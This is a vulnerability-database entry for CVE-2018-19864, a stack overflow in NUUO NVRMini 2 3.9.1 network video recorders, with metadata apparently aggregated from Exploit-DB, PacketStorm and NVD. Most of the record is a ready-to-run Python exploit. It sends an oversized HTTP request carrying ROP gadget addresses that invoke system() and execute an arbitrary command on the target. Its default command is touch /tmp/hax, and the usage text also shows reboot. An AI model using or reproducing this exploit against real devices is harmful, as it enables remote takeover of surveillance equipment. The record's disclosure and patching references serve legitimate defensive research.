ID
VAR-E-201906-0083
CVE
| cve_id: | CVE-2018-19864 | Trust: 1.5 |
EDB ID
46960
TITLE
NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow. CVE-2018-19864 . remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | nuuo | model: | nvrmini | scope: | eq | version: | 23.9.1 | Trust: 2.1 |
EXPLOIT
#!/usr/bin/python
# Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow
# Google Dork: n/a
# Date: Advisory Published: Nov 18
# Exploit Author: @0x00string
# Vendor Homepage: nuuo.com
# Software Link: https://www.nuuo.com/ProductNode.php?node=2
# Version: 3.9.1 and prior
# Tested on: 3.9.1
# CVE : CVE-2018-19864
#
# [ leading / ]
# [ Padding x 335 ]
# [ original value at stack pointer + 158 ]
# [ padding x 80 ]
# [ address of (pop {r3,lr} ; bx lr) ]
# [ system() address ]
# [ address of (mov r0,sp ; blx r3) ]
# [ command to execute ]
def banner():
print '''
@0x00string
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py
'''
def usage ():
print ("python script.py <args>\n"
" -h, --help: Show this message\n"
" -a, --rhost: Target IP address\n"
" -b, --rport: Target Port - default 5150\n"
" -c, --command: Command to execute\n"
"\n"
"Example:\n"
"python script.py -a 10.10.10.10\n"
"python script.py -a 10.10.10.10 -b 1234 -c reboot\n")
exit()
def main():
rhost = None;
rport = "5150";
command = "{/bin/touch,/tmp/hax}"
banner()
options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','command=','help'])
for opt, arg in options:
if opt in ('-h', '--help'):
usage()
elif opt in ('-a','--rhost'):
rhost = arg;
elif opt in ('-b','--rport'):
rport = arg;
elif opt in ('-c','--command'):
command = arg;
print ("Sending exploit to execute [" + command + "]\n")
buf = "GET /" + ("Z" * 335) + "\x30\x2a\x17\x45" + ("Y" * 80) + "\x08\xfc\x78\x40" +
"\x44\xe0\x17\x40" + "\xcc\xb7\x77\x40" + command + " HTTP/1.1\r\nHost: " +
"http://" + rhost + ":" + rport + "\r\n\r\n"
sock = socket(AF_INET, SOCK_STREAM)
sock.settimeout(30)
sock.connect((target_ip,int(target_port)))
sock.send(buf)
print ("done\n")
if __name__ == "__main__":
main()
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'sscanf' Stack Overflow
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | overflow | Trust: 0.5 |
CREDITS
@0x00string
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2018-19864 | Trust: 2.1 |
| db: | EXPLOIT-DB | id: | 46960 | Trust: 1.6 |
| db: | EDBNET | id: | 101567 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 153162 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2018-19864 | Trust: 1.5 |
| url: | https://www.exploit-db.com/exploits/46960/ | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 153162 |
| db: | EXPLOIT-DB | id: | 46960 |
| db: | EDBNET | id: | 101567 |
LAST UPDATE DATE
2022-07-27T09:51:29.385000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 153162 | date: | 2019-06-04T03:33:33 |
| db: | EXPLOIT-DB | id: | 46960 | date: | 2019-06-04T00:00:00 |
| db: | EDBNET | id: | 101567 | date: | 2019-06-04T00:00:00 |